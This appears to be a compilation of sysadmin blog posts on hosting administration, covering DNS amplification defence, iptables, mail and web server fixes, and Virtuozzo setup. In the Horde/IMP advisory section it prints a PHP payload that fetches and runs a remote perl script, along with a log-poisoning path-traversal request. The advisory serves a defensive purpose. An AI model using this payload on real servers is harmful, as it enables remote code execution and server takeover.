Protect your server from DDoS attacks – Part 2 !!

We have been talking about DDoS attacks directed at the web-server all this
while  ( http://letushare.com/protect-your-server-from-ddos-attacks )

Another headache would be when these attacks are directed at our DNS services,
which is often called as DNS Amplification Attacks.

In Simple words, the attack can be explained as follows :

Someone makes an enquiry to you, on how to reach a particular destination. You are not actually sure of the location either, so you ask your friends nearer to you, and if you don’t get an answer from them, you are determined to somehow get an answer and you start inquiring
further until you get one. ( Basically you do not know this ‘someone’ who requested your help)

And this ‘someone’ has not stopped there. He has asked this same question to
lots many other people whom like you are determined to get an answer. He would
conclude by saying, if you get an answer, please ring me to 111 – a fake number of
some unknown poor guy.

Similarly, an attacker spoofs IP addresses ( he might spoof it to an IP to which
he would like to carry a DDoS attack – called as the target – like the fake 111 number ) and sends a request to your DNS server asking to resolve a domain. Your DNS server would not have any details about it in your local db’s. So it goes around the internet trying to resolve the domain and as a result the request-queries and the reply-queries increase beyond a limit as the attacker sends more and more request queries.

Now, remember your server might be 1 in 10000 out of which the attacker would direct the reply’s to a target. ( If source IP of the DNS query was spoofed to that of the target’s IP )

So basically, this sort of DDoS attacks, not only affects the ‘target’ but also all the
DNS server’s participating in this attack, as they are flooded with queries ( request and reply )

Attackers will typically submit a request for as much zone information as possible to maximize the amplification effect. In most attacks of this type, the spoofed queries sent by the attacker are of the type, “ANY,” which returns all known information about a DNS zone in a single request. Because the size of the response is considerably larger than the request, the attacker is able to increase the amount of traffic being generated by these DNS services and in the end- the amount of traffic directed at the target would be huge.

So, how can we prevent this from happening ?

Going back to our previous illustration, when that ‘someone’ asked you for a help,
its you who sought to find an answer. You could have said :

“Im sorry, I dont know the route to that destination. Neither do i know you, so i cant spend
my time/energy in assisting you.

This is where you can make your DNS server a closed resolver.

More on this is found at the page, http://letushare.com/169/

And suppose, consider this, your DNS server is closed, still it would receive the
queries from the attacker and your server would have to reply to those DNS queries. Just that
it is not a part of the attack. These replies too might hinder your services if too
much requests are being directed to your server.

Here you can use iptables to set a rate-limit on the queries reaching your DNS port.

First make sure the recent module is loaded in the server
This module is needed to get this particular aspect of iptables working.

First rule is set to move all the packets received in port 53 to a new chain


# iptables -N block ( create a new chain )
# iptables -A INPUT -p udp --dport 53 -j block

Then,

# iptables -A block -m recent --set --name DNSQF --rsource ( creating a db DNSQF to capture the packets )

# iptables -A block -m recent --update --seconds 5 --hitcount 15 --name DNSQF

--rsource -j DROP ( set the rule for the db DNSQF which stores recent IPs )

The above rule implies to drop every packets after the 15th one, in a time-frame of 5 seconds.

Availing these rules in iptables, can in way help to reduce the traffic in your server,
when DNS queries are made to your server, even when it is a closed resolver.

MySQL server not starting ?

There are ton’s of causes for which MySQL might not start,
ranging from disk space full to databases getting corrupt.

First place where you have to check for a clue is the .err log
( /var/lib/mysql/hostname.err )

If the err corresponds to something like this :

InnoDB: End of page dump
140104 12:33:19 InnoDB: Page checksum 2288969011, prior-to-4.0.14-form checksum 2949853821
InnoDB: stored checksum 492713095, prior-to-4.0.14-form stored checksum 2949853821
InnoDB: Page lsn 0 40542, low 4 bytes of lsn at page end 40542
InnoDB: Page number (if stored to page already) 47,
InnoDB: space id (if created with >= MySQL-4.1.1 and stored already) 0
InnoDB: Page may be an update undo log page
InnoDB: Page may be an index page where index id is 12
InnoDB: Also the page in the doublewrite buffer is corrupt.
InnoDB: Cannot continue operation.
InnoDB: You can try to recover the database with the my.cnf
InnoDB: option:
InnoDB: innodb_force_recovery=6

One of the reason for this error is the use of multiple
storage engines, MyISAM or InnoDB

Check your /etc/my.cnf for any lines which highlight the use
of multiple storage engines.

Following can be an example :

innodb_force_recovery=4
default-storage-engine=MyISAM

The above configuration implies MyISAM is the default
storage engine, but another setting related to innoDB is
already given, which conflicts.

If your default storage engine is MyISAM, then
giving the following option in /etc/my.cnf would
help : skip-innodb

Apache error — No space left on device: Couldn’t create accept lock

Apache: [emerg] (28)No space left on device: Couldn’t create accept lock

[notice] suEXEC mechanism enabled (wrapper: /usr/local/apache/bin/suexec)
[crit] (28)No space left on device: mod_rewrite: Parent could not create RewriteLock file /usr/local/apache/logs/rewrite_lock

semget: [emerg] (28) No space left on device OR Apache: No space left on device: Couldn’t create accept lock

You might check if disk space is full and can easily confirm that is not the reason for this error.

The reason behind the error message is Semaphores. You will have to kill the hung/stuck semaphore processes in order

To list the PIDs of the active semaphore processes, execute:

# ipcs -s
—— Semaphore Arrays ——– key
semid owner perms nsems
0×00000000 366673220 apache 600 1
0×00000000 366706589 apache 600 1
0×00000000 366732358 apache 600 1
0×00000000 366734353 apache 600 1

To kill those process, use the command :

# ipcrm -s PID

Once those stuck/hung processes are cleared, restart your apache service.

 

A cPanel bug ( for version — 11.40 ) with clamAV

Getting the following error message ?

===========

Original Message --------
Subject: Cron /usr/local/cpanel/3rdparty/bin/freshclam --quiet --no-warnings
From: (Cron Daemon)
To: root@hostname
Date: 12/12/2013 04:38
> ERROR: Can't create temporary directory

/usr/local/cpanel/3rdparty/share/clamav/clamav-xxxxx.tmp

===========

This is a known issue/bug with cPanel in 11.40

Although the directory ‘/usr/local/cpanel/3rdparty/share/clamav’
has enough permission and ownership configured, it is not able to
create the required files/folders.

A temporary workaround to this issue is to change the ownership of
the directory as shown below :

==========

chown clamav:clamav /usr/local/cpanel/3rdparty/share/clamav

==========

A vulnerability with older versions of Horde/IMP in Plesk !

The Horde/IMP package (3.1.7-3.3.2) that is shipped with Plesk v. 8.x and earlier versions of 9.x (before 9.5.4) has a vulnerability that allows an attacker to run malicious software by passing the login to the webmail with a POST request to the /horde/imp/redirect.php file that includes the PHP code as the username. For example:

<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;

perl new.txt;rm -rf new.txt"); ?>

This results in the PHP code being logged to the /var/log/psa-horde/psa-horde.log file, which, due to a vulnerability in the barcode.php file, allows attackers to cause Horde to execute the code by making this request:

/horde/util/barcode.php?type=../../../../../../../../../../../

var/log/psa-horde/psa-horde.log

Here is what the actual requests the attacker uses and the log entry from the psa-horde.log
file would look like:

xx.xx.xx.xx - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php

HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5)

Gecko/20091102 Firefox/3.5.5"

xx.xx.xx.xx - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?

Resolution

Resolution as suggested by parallels is downloading the patch for Horde and place it in
/usr/share/psa-horde/lib/Horde/

Patch can be obtained from :

http://kb.parallels.com/Attachments/19039/Attachments/patch%20Horde%203.1.7.zip

Open resolvers !!

Open resolver ??

Before getting to know what is an open resolver, you need to know what
is recursion, ie recursive queries !

Suppose you have a DNS server configured and a local machine which uses
your DNS server queries for a website. Imagine this query is a new one 
and its not in the local cache of the machine which made the request.
Once this request reaches your DNS server, it will attempt to find the
website in question in its local cache. If it cannot find an answer it
will query other DNS servers on your behalf until it finds the address.
It will then respond to the original request with the results from each
server’s query.

This scenario is fine, because the local machine which made the initial
request is trusted by you.

What if another machine which isn’t trusted by you, queries your DNS server
for the same ? Then your DNS is an Open resolver.

An open DNS resolver is a name server that provides a recursive name resolution
for non local clients or users. Basically it’s a name server that provides recursive
replies for every system on the internet. Local users or “authorized” clients are
users on networks that you control and/or that you trust. Recursive replies are
the result of following the chain of delegations found in DNS, ending up at the
domain name that was requested by the original user.

Open DNS resolvers are frequently being abused to conduct efficient DDoS attacks towards
websites, infrastructure and services. In a DNS amplification DDoS attack, the attacker
sends a DNS name lookup request to an open DNS resolver with the source address
spoofed to be the victim’s address.

When the DNS server sends the DNS record response, it is sent
to the victim (the source address that was used in the spoofed request). Because the size
of the response is typically considerably larger than the request, the attacker is able to
amplify the volume of traffic directed at the victim. Dont think it would affect just the
victim. Essentially this means that your equipment is taking part in a botnet leveraging
a DDoS attack towards other systems, potentially causing disruption of services and harm.

If your systems take part in such a DDoS attack then your own network, server and services
infrastructure too can easily become congested.

To get around this issue, configure your DNS server to either disable recursion or
allow recursion from trusted set of IPs.

recursion can be disabled by adding the following line to your /etc/named.conf file :

options {

recursion no;

};

You can allow recursion from a trusted set of IPs by giving the following

options {

allow-recursion { 127.0.0.1; IP1; IP2; }; //include your server IPs and
your provider’s nameserver IPs and whichever IPs you feel can be trusted
.
};

Suppose you have a DNS server and you have configured your named as

allow-recursion { IP1;IP2; } ;

Try the following from the machine with IP1,

#nslookup google.com x.x.x.x ( x.x.x.x is the DNS server IP )

The result would be :

———–

(root) nameserver = J.ROOT-SERVERS.NET
(root) nameserver = K.ROOT-SERVERS.NET
(root) nameserver = L.ROOT-SERVERS.NET
(root) nameserver = M.ROOT-SERVERS.NET
(root) nameserver = A.ROOT-SERVERS.NET
(root) nameserver = B.ROOT-SERVERS.NET
(root) nameserver = C.ROOT-SERVERS.NET
(root) nameserver = D.ROOT-SERVERS.NET
(root) nameserver = E.ROOT-SERVERS.NET
(root) nameserver = F.ROOT-SERVERS.NET
(root) nameserver = G.ROOT-SERVERS.NET
(root) nameserver = H.ROOT-SERVERS.NET
(root) nameserver = I.ROOT-SERVERS.NET

…..

———–

Suppose you made the same query from an IP which is not
defined in allow-recursion, then you get the following

———-

Server: x.x.x.x
Address: x.x.x.x#53

** server can’t find google.com: REFUSED

———-

So, consider about tweaking your DNS server, if its an Open resolver !

csf & iptables cheatsheet !!

CSF

csf -a   : allow an ip and add it to /etc/csf.allow
csf -ar  : remove an ip from /etc/csf.allow and delete rule
csf -d   : deny an ip and add to /etc/csf.deny
csf -dr  : unblock an ip and remove from /etc/csf.deny
csf -g   : search the list and give the rule that matches the ip
csf -tr : Remove the IP from temporary ban
csf -x   : disable csf and lfd
csf -e   : enable csf and lfd if disabled
csf -r   : restart csf

CSF config files

  • /etc/csf/csf.conf     :csf config file
  • /etc/csf/csf.allow    :csf allow file
  • /etc/csf/csf.deny     :csf deny file
  • /etc/csf/csf.ignore   :ignore list file ( the ip’s lfd should ignore and not block )
  • /etc/csf/csf.tempban  :to see the ips in temporary ban

To block an entire range of IP’s from a country

Open CSF config file and check for the line  “CC_DENY”  and add the corresponding country code.

For eg, if you want to block the IPs from china, add the country code as ‘CN’

IPTABLES

service iptables status : display the status of firewall
iptables -F :flush out rules
iptables -L -INPUT -n : check the lines of the chain input
iptables -I INPUT -s x.x.x.x -j DROP   : block a single ip address
iptables -D INPUT -s x.x.x.x -j DROP   : delete the ip from the rule
iptables -A INPUT -s x.x.x.x -j ACCEPT : allow all traffic from the ip address
iptables -A INPUT -p tcp --dport 3306 -j DROP : block a port from all ip
iptables -A INPUT -p tcp -s x.x.x.x --dport 3306 -j ACCEPT : allow a port from a single ip
iptables -A INPUT -m mac --mac-source 00:0F:EA:91:04:08 -j DROP :
block traffic from mac address

Diff b/w DROP and REJECT : REJECT works like DROP, but will return an error
message to the host sending the packet that the packet was blocked

iptables-save > /root/rule.file: To save iptables rules to an external file
iptables-restore < /root/rule.file
: To restore the rules back

iptables -L INPUT --line-numbers : To list the rules along with the rule
number in the chain 'INPUT'
iptables -D INPUT 1 : To delete the rule 1 in the chain INPUT

Passive mode FTP !

Enable the passive port range for Pure-FTPd !!

Before that, an overview of different modes for an FTP connection.

File Transfer Protocol (FTP) has 2 modes that you can use for an FTP connection: active and passive. During active mode, the FTP server responds to the connection attempt and returns a connection request from a different port to the FTP client. FTP’s passive mode allows the FTP client to initiate both connection attempts.

Now, to enable passive mode and its range,

* Open the /etc/pure-ftpd.conf configuration file in your preferred text editor.
* Remove the comment (#) from the beginning of the line which contains the PassivePortRange option.
* Change that line to the following:

PassivePortRange 49152 65534 ( indicate the range here )

* Save the changes to the configuration file.
* Run the /usr/local/cpanel/scripts/restartsrv_ftpserver command to restart the server.

Remember to open these ports in firewall.

Options +Includes — what is it ?

What is the option seen as Options +Includes ??

SSI (Server Side Includes) are directives that are placed in HTML pages, and evaluated on the
server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.

The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served.

SSI is a great way to add small pieces of information, such as the current time.

To permit SSI on your server, you must have the following directive either in your httpd.conf file, or in a .htaccess file:

Options +Includes

Issue with Apache and SymLinks

The vulnerability with Symlinks and Apache is a known issue
in a shared hosting environment.

1st step employed by the attacker in order to carry out this attack it to find a compromised ‘single’ website or domain which has got any vulnerable scripts or 3rd party applications or any themes used in it. Once he get access to a single domain, he moves forward by creating the symlinks to other websites or even he can symlink to / (root).

For eg, if you have the following symlink set in any domain,

link -> /root , using the directory ‘link’ anyone can actually access
/root and can access any sensitive file.

Rather than manually creating this sort of symlinks, the hacker can even use any
perl/cgi script to create a symlink to other users of the server.

As a basic soultion for this, you can ensure that Apache is configured in a
way so as not to following symlinks (Options -FollowSymLinks)

================

To disable the ability for Apache to allow users to follow symbolic links in their requests, remove the FollowSymLinks directive on your Directory commands.

For example, if the below was the configuration then,

<Directory "/usr/local/apache/htdocs">
Options Indexes FollowSymLinks
AllowOverrride None
Order allow,deny
Allow from all

Remove the FollowSymLinks reference so that this reads:

<Directory "/usr/local/apache/htdocs">
Options Indexes
AllowOverrride None
Order allow,deny
Allow from all

================

If you really need symlinks, you can use the “SymLinksIfOwnerMatch” option to only
allow links from within the same user.

To prevent PHP from accessing any file outside of their directory, you need to specify the ‘open_basedir’ setting ( in PHP configuration file ) to only have access to their directory.

This option can be enabled from WHM, but :

==========

This security tweak uses Apache DSO style directives. If PHP is
configured to run as a CGI, SuPHP or
FastCGI process, the open_basedir setting must be manually specified
in the relevant php.ini file.
See the EasyApache documentation for more information.

==========

If the PHP handler is set as CGI or SuPHP, then tweak settings seen in WHM
cannot be used to set the openbase_dir option.

You need to manually specify the openbase_dir option in the global
PHP configuration file ( use php -i |grep php.ini to find the php.ini location )

In addition to prevent this SymLinks attack, there are various patches too :

https://forums.cpanel.net/f185/solutions-handling-symlink-attacks-202242-p4.html#post996441

To be kept in mind is :: the root cause for this attack or vulernablity is due any
unsecured scripts/plugins/applications which might be employed in any of the domains.

ip_conntrack: table full, dropping packet !!

Facing an issue with the kernel module, ‘ip_conntrack’ ?

Checking /var/log/messages gives something like this ?

==========

Nov 13 14:45:23 host kernel: ip_conntrack: VPS xxx table full, dropping packet.
Nov 13 14:45:43 host kernel: ip_conntrack: VPS xxx table full, dropping packet.
Nov 13 14:45:48 host kernel: ip_conntrack: VPS xxx table full, dropping packet.

==========

If you run an iptables firewall, and have rules that act upon the state of a packet,
then the kernel uses ip_conntrack to keep track of what state what connections are in so that
the firewall rule logic can be applied against them. If you have a system that’s getting a lot
of network activity then the table will accumulate entries.

* Increase ip_conntrack to a higher value by editing /etc/sysctl.conf

Add/edit this line,

net.ipv4.ip_conntrack_max=xxxx

Run , #sysctl -p after making the changes.

Check the current value using the command,

# sysctl net.ipv4.netfilter.ip_conntrack_max

Dont keep on increasing the above value (ip_conntrack_max) beyond a limit, if you still see the error after the increase. This error might indicate the start of something more destructive attack on your servers network, something like a DDoS attacks. The amount of packets sent/received during this period would be on the higher side and as a result the kernel module isnt able to process them all, which results in the above error.

So check for the server traffic using commands like iftop or tcpdump and isolate if the
issue is related to any attacks.

Dovecot issue – dovecot.index file broken ?

Dovecot issue – dovecot.index file corrupted?

Any email user not able to access via his webmail? Does it show
logins failed, even if you are cent percent sure logins are correct?

Check /var/log/maillog.

# tailf /var/log/maillog

If you find anything like dis,

=============

Nov 12 20:59:02 host dovecot: imap(zzzz@yyyy.com): Error: Transaction log file /home/xxxx/mail/yyyy.com/zzzz/dovecot.index.log seq 302:

Nov 12 20:59:02 host dovecot: imap(zzzz@yyyy.com): Error: broken sync positions in index file /home/xxxx/mail/yyyy.com/zzzz/dovecot.index

Nov 12 20:59:02 host dovecot: imap(zzzz@yyyy.com): Warning: fscking index file /home/xxxx/mail/yyyy.com/zzzz/dovecot.index

Nov 12 20:59:02 host dovecot: imap(zzzz@yyyy.com) Error: Fixed index file /home/xxxx/mail/yyyy.com/zzzz/dovecot.index log_file_tail_offset 1184 -> 988

Nov 12 20:59:02 host dovecot: imap(zzzz@yyyy.com): Panic: file mail-transaction-log.c: line 350 (mail_transaction_log_set_mailbox_sync_pos): assertion failed: (file_offset >= log->head->saved_tail_offset)

=============

As indicated in the logs, there seems to be an issue with the dovecot index file for the user ‘zzzz’. The basic idea behind Dovecot’s index files is that it makes reading the mailboxes a lot faster.

This happens to be a long term issue with dovecot.

The solution to fix this issue is to delete dovecot.index file.

 

Out of memory error in PHP scripts?

Facing the following error when running any PHP scripts ?

=========
PHP Fatal error: Out of memory (allocated xxxxx (tried to allocate xxxx bytes)
=========

Tried increasing the memory limit from php.ini file and still getting the above error ?

Initially, we might think this issue is with the memory limit factor seen in php.ini file.
But if we analyze the error we get we can see that the issue was not with
the PHP.ini configuration settings.

Usually, when a PHP script does not have enough memory to execute itself,
the error message seen is as below :

=========
Fatal error: Allowed memory size of xxxx bytes exhausted (tried to allocate xxxxxx bytes)
=========

In this case, the error seen is not the usual one, which suggests its not directly related to the PHP configuration.

When we analyse things further, we could see that the real issue lies within
the Apache configuration. Apache have memory limits of its own set in the configuration
files. This value is referred to as ‘RLimitMEM’

Explanation of RLimitMEM from the official documentation of Apache :

===============

RLimitMEM Directive

It sets the soft resource limit for all processes and the second parameter sets the maximum resource limit. It indicate to the server that the limit should be set to the maximum allowed by the operating system configuration. Raising the maximum resource limit requires that the server is running as root, or in the initial startup phase.

This applies to processes forked off from Apache children servicing requests, not the Apache children themselves. This includes CGI scripts and SSI exec commands, but not any processes forked off from the Apache parent such as piped logs.

Memory resource limits are expressed in bytes per process.

===========

So, increase this value/limit from your httpd configuration file, to get around this issue.

Want PHP4 and PHP5 in same cPanel server ?

Want PHP4 and PHP5 running in the same cPanel server ?

Kindly keep in mind, PHP4 is no longer supported (1st released in 2000) Not preferred to do this unless you absolutely need it. Since it’s not supported anymore, it could leave your server more vulnerable than it would be without it.

To install, do the following steps:

* Download the PHP4 custom module for EasyApache from,

http://docs.cpanel.net/twiki/pub/EasyApache/EasyApacheCustomModules/custom_opt_mod-PHP449.tar.gz

* Extract the tarball to the folder, /var/cpanel/easy/apache/cusom_opt_mods

# tar -C /var/cpanel/easy/apache/custom_opt_mods -zxvf custom_opt_mod-PHP449.tar.gz

* Run EasyApache ( from WHM or # /scripts/easyapache )

* Enable the PHP4.4.9 support module in the short options list.

* Complete the steps of EasyApache

* Verify both PHP versions are present

# php4 -v & # php -v

* Configure apache to run both versions of php***

# /usr/local/cpanel/bin/rebuild_phpconf 5 cgi dso 1
(The syntax is rebuild_phpconf <Default PHP Major Version> <PHP4 Handler> <PHP5 Handler> <Suexec>)

–> So in the above case, php5 is default PHP Major version
CGI is PHP4 handler and DSO is PHP5 handler and suexec is enabled.

* If the PHP4 script requires the extension to be .php instead of .php4, you can set the handler for the one site using a .htaccess with the following contents:

AddType application/x-httpd-php4 .php

Exim cheatsheet !!

# cat /var/log/exim_paniclog :info abt the exim program itself
# cat /var/log/exim_mainlog :logs every single transaction that the server handles
# cat /var/log/exim_rejectlog :this logs delivery rejections
# exim -bp :show mails on the queue
# exim -bpc :This option counts the number of messages on the queue
# exim -bpr :This option operates like -bp, but the output is not sorted into
chronological order of message arrival.
# exim -bp | exiqsumm : generate a summary table for all the messages in the queue
# eximstats /var/log/exim_mainlog :  Display Exim stats using the default log file

==================

# eximstats -ne -nr -nt /path/to/exim_mainlog : More concise info from the log

ne : display error info

nr : display relaying info

nt : display transport info that matches

–bydomain:show results by sending domain

–byemail:show results by sender email id

–byhost:show results by sending host

==================

# fgrep YYYY-MM-DD /path/to/exim_mainlog | eximstats : Narrow down Exim stats
generation to a particular day

# exiwhat : show what is exim doing at the moment

# exim -bt [user]@domain : Test how Exim's configuration will handle mail
sent to the specified address

# exiqgrep -f [user]@domain: Find messages from a particular sender in the queue

# exiqgrep -r [user]@domain: Find messages to a particular addressee on your server

# exim -Mrm <message-id> [ <message-id> ... ]: Remove a specific
message(s) from the queue

# exiqgrep -o 36000 -i | xargs exim -Mrm: Remove all messages older than
ten hours (36000 seconds)

# exiqgrep -y 3600 [...] : Use -y to print messages that are younger than the
specified number of seconds. For example, messages less than an hour old

# exim -Mvh <message-id>: View a specific messages full headers

# exim -Mvb <message-id>: View a specific messages body

# exim -Mvl <message-id>: View a specific messages Exim log

# exim -qf : Force another queue run

# exim -qff : Force another queue run and attempt to flush frozen messages

# exim -Mar <message ID> "rcpt address" : Add recipient

# exim -Mes <message ID> "to address" : Edit sender

# exim -bv <address> :Verify an address

# exim -bp | grep frozen | wc -l : To check frozen emails in the queue

# exiqgrep -z -i | xargs exim -Mrm : Delete frozen mails

How to customize SpamAssassin!!

SpamAssassin can be configured from cPanel of each domain. It can be customized further by
adding rules or filters.

In order to specify custom rules for a domain, you need to create the file
~/.spamassassin/user_prefs’ for each domain.

For eg, for the domain letushare.com under the account letushare, you need to create a file /home/letushare/.spamassassin/user_prefs and add the custom rules.

A simple rule,

body LOCAL_DEMONSTRATION_RULE /test/
score LOCAL_DEMONSTRATION_RULE 0.1
describe LOCAL_DEMONSTRATION_RULE

This rule does a simple case-sensitive search of the body of the email for the string 
“test” and adds a 0.1 to the score of the email if it finds it. It will match “test”
but also “testing” and “attest”. The describe statement contains the text which will
be placed into the verbose report, if verbose reports are used.

 

Changing Exim interface IP !!

In order to change the exim interface IP, do the following :

Editing /etc/mailips : This file controls the IP address from which each domains
should send mail. You will need to create and open the /etc/mailips file for editing using
your preferred text editor. You will need to configure this file in the following way:

*: 192.168.0.1 (<- desired IP )

Disable this option,

From WHM »Service Configuration »Exim Configuration Manager>>
Domain and IPs>> Send mail from account’s dedicated IP address "on"

And enable this option,

Reference /etc/mailips for outgoing SMTP connections.

And now, restart the exim service.

Virtuozzo – Basics

Virtuozzo is a software application for enterprise server virtualization that allows an administrator to create virtual environments on a host computer at the operating system (OS) layer. Instead of having one physical machine run multiple operating systems simultaneously, as the virtual machine model used by VMware, Virtuozzo approaches virtualization by running a single OS kernel as its core and exporting that core functionality to various partitions on the host.

Each of the partitions effectively becomes a stand-alone entity called a virtual private server (VPS)

Installation in a CentOS box:
Before proceeding to the installation of virtuzzo make sure you have the partition /vz or
create it if you are installing on a fresh server

/vz contains all container data and parallels virtuzzo containers templates

INSTALLATION
Download the vzinstall-linux-x86_64.bin utilty from the oficial site.
Make the script executable by # chmod a+x vzinstall-linux-x86_64.bin
Run the script by # ./vzinstall-linux-x86_64.bin

You will get the following wizard :
Either you can download and install or install for future or on any other computer.
The configure options allow you to configure the various parameters that the virtuozzo
containers use during the execution. If you select the option download only, after the download is over, go the download directory (root/virtuzzo/Download ) and copy the content of this directory to the system where you are planning to install virtuzzo and execute the following script:

# ./virtuozzo-4.7.0-<build_version>-x86_64.sfx

If you select the option download and install you can either do it in 3 ways:
Default: Select this radio button to download and install the Parallels Virtuozzo Containers program files and one OS template—CentOS 5 (you will need this OS template to create Containers on its basis).

Full: Select this radio button to download all available OS templates to the server and install them there.

Custom: Select this radio button to customize the set of OS templates to download to and install on the server. In this case, once you click the Next button, you will see the Select Templates window where you can choose the necessary OS templates for downloading

In the next step of wizard, click download to start download paralells virtuzzo containers and selected templates to the server.

In the next step you would be asked for the license key.

Install a valid Parallels license by entering the license key number in the field provided and clicking Next. If you plan to activate Parallels Virtuozzo Containers with an activation code,make sure that your server is connected to the Internet

Finally, the installation program displays the Congratulations window.

Leave the Install PVA Agent and Install PVA Management Node check boxes selected to set up the Parallels Virtual Automation application and its components on the server once you restart it. With Parallels Virtual Automation, you can connect to the server and manage Containers using your favorite browser. If you select both check boxes, the installer does the following after restarting the server:

1. Downloads the installation packages for Parallels Virtual Automation from the Parallels website.

2. Install the PVA Agent component on the server. PVA Agent ensures the interaction between your server, the Management Node (see below), and Parallels Virtual Automation. Without this component installed, you will not be able to connect to your server using Parallels Virtual Automation.

3. Creates a special Container on the server and installs the PVA Management Node
component inside it. PVA Management Node (also called Master Server) ensures the
communication between the server running Parallels Virtuozzo Containers (known as Slave
Server) and the Parallels Virtual Automation application. The Master Server keeps a
database with the information about all registered Slave Servers.

If you have already set up a Master Server, you can skip this step (clear Install PVA Management Node check box).

After this step you will be asked for the IP address and hostname and DNS of the container which

will act as the PVA management node.

To log in to Parallels Virtual Automation, launch a Web browser compatible with PVA

The list of currently supported Web browsers is given below:

• Internet Explorer 6.0 and above
• Firefox 2.x and above
• Safari 3.x and above

On the Master Server or any other computer, open your favorite Web browser and log in to Parallels Virtual Automation by typing the Master Server IP address or hostname and TCP port 4648 in the address bar.

http://ipaddressofpvm:4648
Login using the username and password of the container which acts as the PVM

Manually setting up PVA and management node
Create the container : vzctl create CTID –ostemplate centos-6-x86_64 –hostname “hostname”
Set the ip address and nameserver for the created container which will act as the MN

# vzctl start CTID
# vzpkg install CTID -p perl-DBI

Download PVA Management Node installer

# wget http://download.pa.parallels.com/pva/pv ... loy.x86_64
# chmod a+x pva-setup-deploy.x86_64
# ./pva-setup-deploy.x86_64 -d /vz/root/CTID/root/ --extract
# vzctl enter CTID
# cd /root
# ./pva-setup --install

.htaccess files – Basics

A small note on .htaccess file.

What is .htaccess?

.htaccess is a configuration file for use on web servers running the Apache Web Server. When an .htaccess file is placed in a directory it is detected by the web server and gets exectued.These .htaccess files are used to alter the configuration of the Apache Web Server to enable/disable additional functionality and features that the Apache Web Server software has to offer.

A sample .htaccess file :

AuthName "security check"
AuthUserFile /path/to/password/file/.htpasswd
AuthType Basic
require valid-user
ErrorDocument 401 /error_pages/401.html

As per the above .htaccess file, it enables password protection on the directory; it offers redirection to a custom error page if a user fails to login correctly.

This is just a basic example.

.htaccess files are very powerful and they can be extremely fine tuned to meet your needs.

An alias to a subdomain ? — Plesk

Need a domain alias for a sub-domain?
Plesk had a direct option to do this from the front end, which was
taken out in newer versions of Plesk.

You can configure a .com alias to a subdomain by :
create a file in the subdomains conf directly like this:
# vi /var/www/vhost/yoursite.com/subdomains/foo/conf/vhost.conf

contents:
ServerAlias "newaliasname.com"
ServerAlias "www.newaliasname.com"

then rebuild apache config like:
# /opt/psa/admin/sbin/httpdmng --reconfigure-all